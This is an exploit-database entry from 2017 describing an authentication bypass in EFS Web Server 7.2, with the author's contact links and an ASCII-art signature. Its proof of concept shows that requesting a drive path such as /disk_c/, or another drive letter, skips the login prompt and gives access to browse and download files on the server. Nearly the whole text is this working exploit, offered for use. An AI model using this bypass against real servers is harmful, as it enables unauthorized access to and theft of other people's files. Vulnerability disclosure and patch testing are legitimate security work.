# Exploit Title: EFS Web Server 7.2 Authentication Bypass # Date: 11-06-2017 # Software Link: http://www.sharing-file.com/efssetup.exe # Software Version : 7.2 # Exploit Author: Touhid M.Shaikh # Contact: http://twitter.com/touhidshaikh22 # Website: http://touhidshaikh.com/ ######## Description ######## ######## Video PoC and Article ######## https://www.youtube.com/watch?v=XlTH7Fm1m1w http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/ ######## Attact Description ######## ######## Proof of Concept ######## When we visit the EFS web server its prompt for login, now attacker just change url to below. Exploit.... http://192.168.1.14/disk_c/ in this case change drvie by just change /disk_c to /disk_ example. /disk_d , /disk_f etc ============================================= NOTE :: :: Now We have Permission to View Drives and Folder and Download Files. in Diffrent Drives or folder. ============================================ _____ ___ _ _ _ _ ___ ____ |_ _/ _ \| | | | | | |_ _| _ \ | || | | | | | | |_| || || | | | | || |_| | |_| | _ || || |_| | |_| \___/ \___/|_| |_|___|____/ Touhid Shaikh....... # Iranian Exploit DataBase = http://IeDb.Ir [2017-06-11]